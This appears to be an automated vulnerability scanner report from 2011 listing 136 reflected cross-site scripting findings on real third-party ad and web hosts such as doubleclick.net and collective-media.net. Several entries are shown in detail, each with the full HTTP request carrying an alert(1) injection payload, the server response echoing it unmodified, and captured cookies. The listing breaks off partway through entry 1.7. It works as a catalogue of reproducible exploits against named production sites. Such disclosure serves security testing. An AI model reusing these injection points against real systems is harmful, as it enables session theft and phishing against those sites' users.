XSS, Cross Site Scripting, DORK, CWE-79, CAPEC-86, PoC Report

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Tue Mar 08 07:08:32 CST 2011.


The DORK Report


1. Cross-site scripting (reflected)

1.1. http://a.collective-media.net/ad/cm.merriamwebster/ron_010110 [REST URL parameter 1]

1.2. http://a.collective-media.net/adj/cm.merriamwebster/ron_010110 [REST URL parameter 2]

1.3. http://a.collective-media.net/adj/cm.merriamwebster/ron_010110 [REST URL parameter 3]

1.4. http://a.collective-media.net/adj/cm.merriamwebster/ron_010110 [name of an arbitrarily supplied request parameter]

1.5. http://a.collective-media.net/adj/cm.merriamwebster/ron_010110 [sz parameter]

1.6. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [adurl parameter]

1.7. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [ai parameter]

1.8. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [client parameter]

1.9. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [num parameter]

1.10. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [sig parameter]

1.11. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [sz parameter]

1.12. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [mt_adid parameter]

1.13. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [mt_id parameter]

1.14. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [mt_uuid parameter]

1.15. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [redirect parameter]

1.16. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [sz parameter]

1.17. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_adid parameter]

1.18. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_adid parameter]

1.19. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_id parameter]

1.20. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_id parameter]

1.21. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_uuid parameter]

1.22. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_uuid parameter]

1.23. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [redirect parameter]

1.24. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [redirect parameter]

1.25. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [sz parameter]

1.26. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [sz parameter]

1.27. http://ad.doubleclick.net/adj/syn.embarq/footer [name of an arbitrarily supplied request parameter]

1.28. http://ad.doubleclick.net/adj/test.gmaps/business [dc_ref parameter]

1.29. http://ad.doubleclick.net/adj/test.gmaps/business [name of an arbitrarily supplied request parameter]

1.30. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

1.31. http://ad3.liverail.com/ [name of an arbitrarily supplied request parameter]

1.32. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]

1.33. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]

1.34. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

1.35. http://admeld.adnxs.com/usersync [admeld_callback parameter]

1.36. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

1.37. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

1.38. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

1.39. http://ads.pointroll.com/PortalServe/ [r parameter]

1.40. http://ads.pointroll.com/PortalServe/ [redir parameter]

1.41. http://ads.pointroll.com/PortalServe/ [time parameter]

1.42. http://ak.quantcast.com/css/ie6.css [REST URL parameter 1]

1.43. http://ak.quantcast.com/css/ie6.css [REST URL parameter 2]

1.44. http://ak.quantcast.com/css/ie7.css [REST URL parameter 1]

1.45. http://ak.quantcast.com/css/ie7.css [REST URL parameter 2]

1.46. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 1]

1.47. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 2]

1.48. http://ak.quantcast.com/js/concat.js [REST URL parameter 1]

1.49. http://ak.quantcast.com/js/concat.js [REST URL parameter 2]

1.50. http://api-public.addthis.com/url/shares.json [callback parameter]

1.51. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

1.52. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

1.53. http://api.dimestore.com/viapi [id parameter]

1.54. http://ar.voicefive.com/b/rc.pli [func parameter]

1.55. http://b.scorecardresearch.com/beacon.js [c1 parameter]

1.56. http://b.scorecardresearch.com/beacon.js [c10 parameter]

1.57. http://b.scorecardresearch.com/beacon.js [c15 parameter]

1.58. http://b.scorecardresearch.com/beacon.js [c2 parameter]

1.59. http://b.scorecardresearch.com/beacon.js [c3 parameter]

1.60. http://b.scorecardresearch.com/beacon.js [c4 parameter]

1.61. http://b.scorecardresearch.com/beacon.js [c5 parameter]

1.62. http://b.scorecardresearch.com/beacon.js [c6 parameter]

1.63. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 2]

1.64. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 3]

1.65. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 4]

1.66. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 5]

1.67. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 6]

1.68. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 7]

1.69. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 2]

1.70. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 3]

1.71. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 4]

1.72. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 5]

1.73. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 6]

1.74. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 7]

1.75. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 2]

1.76. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 3]

1.77. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 4]

1.78. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 5]

1.79. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 6]

1.80. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 7]

1.81. http://blekko.com/autocomplete [query parameter]

1.82. http://blekko.com/ws/+collegehumor.com+/ddgapi [REST URL parameter 3]

1.83. http://blekko.com/ws/+elbo.ws+/ddgapi [REST URL parameter 3]

1.84. http://blekko.com/ws/+nick.com+/ddgapi [REST URL parameter 3]

1.85. http://blekko.com/ws/elbo.ws+/visualize [REST URL parameter 3]

1.86. http://blekko.com/ws/http:%2F%2Fcloudscan.me+/seo [REST URL parameter 3]

1.87. http://blekko.com/ws/http:%2F%2Fcloudscan.us+/seo [REST URL parameter 3]

1.88. http://blekko.com/ws/http:%2F%2Felbo.ws%2F+/seo [REST URL parameter 3]

1.89. http://blekko.com/ws/http:%2F%2Fxss.cx+/seo [REST URL parameter 3]

1.90. http://blekko.com/ws/http://elbo.ws/+/duptext [REST URL parameter 5]

1.91. http://blekko.com/ws/http://elbo.ws/+/sections [REST URL parameter 5]

1.92. http://blekko.com/ws/http://elbo.ws/+/urlseo [REST URL parameter 5]

1.93. http://blekko.com/ws/http://elbo.ws/+/visualize [REST URL parameter 5]

1.94. http://community.bomgar.com/index.php [REST URL parameter 1]

1.95. http://community.npr.org/ver1.0/Direct/Jsonp [cb parameter]

1.96. http://control.adap.tv/control [as parameter]

1.97. http://control.adap.tv/control [categories parameter]

1.98. http://control.adap.tv/control [companionId parameter]

1.99. http://control.adap.tv/control [description parameter]

1.100. http://control.adap.tv/control [duration parameter]

1.101. http://control.adap.tv/control [eov parameter]

1.102. http://control.adap.tv/control [height parameter]

1.103. http://control.adap.tv/control [id parameter]

1.104. http://control.adap.tv/control [isTop parameter]

1.105. http://control.adap.tv/control [keywords parameter]

1.106. http://control.adap.tv/control [name of an arbitrarily supplied request parameter]

1.107. http://control.adap.tv/control [pageUrl parameter]

1.108. http://control.adap.tv/control [sessionId parameter]

1.109. http://control.adap.tv/control [title parameter]

1.110. http://control.adap.tv/control [url parameter]

1.111. http://control.adap.tv/control [width parameter]

1.112. http://control.adap.tv/control [zid parameter]

1.113. http://desk.opt.fimserve.com/adopt/ [sz parameter]

1.114. http://digg.com/submit [REST URL parameter 1]

1.115. http://dm.de.mookie1.com/2/B3DM/2010DM/1379918009@x23 [REST URL parameter 2]

1.116. http://dm.de.mookie1.com/2/B3DM/2010DM/1379918009@x23 [REST URL parameter 3]

1.117. http://dm.de.mookie1.com/2/B3DM/2010DM/1379918009@x23 [REST URL parameter 4]

1.118. http://dm.de.mookie1.com/2/B3DM/2010DM/1379918009@x23 [name of an arbitrarily supplied request parameter]

1.119. http://dm.de.mookie1.com/2/B3DM/2010DM/141706813@x23 [REST URL parameter 2]

1.120. http://dm.de.mookie1.com/2/B3DM/2010DM/141706813@x23 [REST URL parameter 3]

1.121. http://dm.de.mookie1.com/2/B3DM/2010DM/141706813@x23 [REST URL parameter 4]

1.122. http://dm.de.mookie1.com/2/B3DM/2010DM/141706813@x23 [USNetwork/Dell_Streak11Q1_Max_Demo_160 parameter]

1.123. http://dm.de.mookie1.com/2/B3DM/2010DM/141706813@x23 [name of an arbitrarily supplied request parameter]

1.124. http://domainnamesales.com/lcontact/ [name of an arbitrarily supplied request parameter]

1.125. http://ds.addthis.com/red/psi/sites/www.kenexa.com/p.json [callback parameter]

1.126. http://ds.addthis.com/red/psi/sites/www.metrolyrics.com/p.json [callback parameter]

1.127. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

1.128. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

1.129. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

1.130. http://ar.voicefive.com/bmx3/broker.pli [ar_p39750809 cookie]

1.131. http://ar.voicefive.com/bmx3/broker.pli [ar_p58096422 cookie]

1.132. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

1.133. http://ar.voicefive.com/bmx3/broker.pli [ar_p84053757 cookie]

1.134. http://bullhorn.app6.hubspot.com/salog.js.aspx [hubspotutk cookie]

1.135. http://bullhorn.com/ [Referer HTTP header]

1.136. http://bullhorn.com/newsrelease-details.php [Referer HTTP header]



1. Cross-site scripting (reflected)
There are 136 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.



1.1. http://a.collective-media.net/ad/cm.merriamwebster/ron_010110 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/cm.merriamwebster/ron_010110

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f10a2<script>alert(1)</script>53d79e419f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adf10a2<script>alert(1)</script>53d79e419f3/cm.merriamwebster/ron_010110 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal-sea; dp2=1; apnx=1; qcms=1; rdst12=1; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; cli=11e4f07c0988ac7; nadp=1; mmpg=1; targ=1; rdst11=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 86
Date: Tue, 08 Mar 2011 11:59:13 GMT
Connection: close

unknown path /adf10a2<script>alert(1)</script>53d79e419f3/cm.merriamwebster/ron_010110

1.2. http://a.collective-media.net/adj/cm.merriamwebster/ron_010110 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.merriamwebster/ron_010110

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6c7a'-alert(1)-'d8ef1576c28 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.merriamwebsterf6c7a'-alert(1)-'d8ef1576c28/ron_010110;sz=728x90;ord=459401240? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_728_TOP&groupid=5332614444&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; rdst11=1; rdst12=1; dp2=1; nadp=1; targ=1; apnx=1; qcms=1; qcdp=1; mmpg=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Vary: Accept-Encoding
Date: Mon, 07 Mar 2011 00:56:44 GMT
Connection: close
Set-Cookie: dc=dal-dc-sea; domain=collective-media.net; path=/; expires=Wed, 06-Apr-2011 00:56:44 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.merriamwebsterf6c7a'-alert(1)-'d8ef1576c28/ron_010110;sz=728x90;net=cm;ord=459401240;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.3. http://a.collective-media.net/adj/cm.merriamwebster/ron_010110 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.merriamwebster/ron_010110

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 243d1'-alert(1)-'a765c13a6fe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.merriamwebster/ron_010110243d1'-alert(1)-'a765c13a6fe;sz=728x90;ord=459401240? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_728_TOP&groupid=5332614444&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; rdst11=1; rdst12=1; dp2=1; nadp=1; targ=1; apnx=1; qcms=1; qcdp=1; mmpg=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Date: Mon, 07 Mar 2011 00:56:45 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc-dal-sea; domain=collective-media.net; path=/; expires=Wed, 06-Apr-2011 00:56:45 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.merriamwebster/ron_010110243d1'-alert(1)-'a765c13a6fe;sz=728x90;net=cm;ord=459401240;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.4. http://a.collective-media.net/adj/cm.merriamwebster/ron_010110 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.merriamwebster/ron_010110

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload effe1'-alert(1)-'8cb31a19829 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.merriamwebster/ron_010110;sz=728x90;ord=459401240?&effe1'-alert(1)-'8cb31a19829=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_728_TOP&groupid=5332614444&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; rdst11=1; rdst12=1; dp2=1; nadp=1; targ=1; apnx=1; qcms=1; qcdp=1; mmpg=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 458
Vary: Accept-Encoding
Date: Mon, 07 Mar 2011 00:56:44 GMT
Connection: close
Set-Cookie: dc=dal-dc-sea; domain=collective-media.net; path=/; expires=Wed, 06-Apr-2011 00:56:44 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.merriamwebster/ron_010110;sz=728x90;net=cm;ord=459401240?&effe1'-alert(1)-'8cb31a19829=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.5. http://a.collective-media.net/adj/cm.merriamwebster/ron_010110 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.merriamwebster/ron_010110

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e194e'-alert(1)-'1da20828cff was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.merriamwebster/ron_010110;sz=728x90;ord=459401240?e194e'-alert(1)-'1da20828cff HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_728_TOP&groupid=5332614444&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; rdst11=1; rdst12=1; dp2=1; nadp=1; targ=1; apnx=1; qcms=1; qcdp=1; mmpg=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 455
Vary: Accept-Encoding
Date: Mon, 07 Mar 2011 00:56:44 GMT
Connection: close
Set-Cookie: dc=dal-dc-sea; domain=collective-media.net; path=/; expires=Wed, 06-Apr-2011 00:56:44 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.merriamwebster/ron_010110;sz=728x90;net=cm;ord=459401240?e194e'-alert(1)-'1da20828cff;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.6. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e36a2"-alert(1)-"60de33534d4 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=e36a2"-alert(1)-"60de33534d4 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7082
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Mar 2011 13:16:17 GMT
Expires: Mon, 07 Mar 2011 13:16:17 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
eHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=e36a2"-alert(1)-"60de33534d4http://ads.networksolutions.com/landing?code=P99C519S512N0B2A1D38E0000V109");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never
...[SNIP]...

1.7. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8e24"-alert(1)-"68e3df219f9 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxAa8e24"-alert(1)-"68e3df219f9&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=;ord=1467384676? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
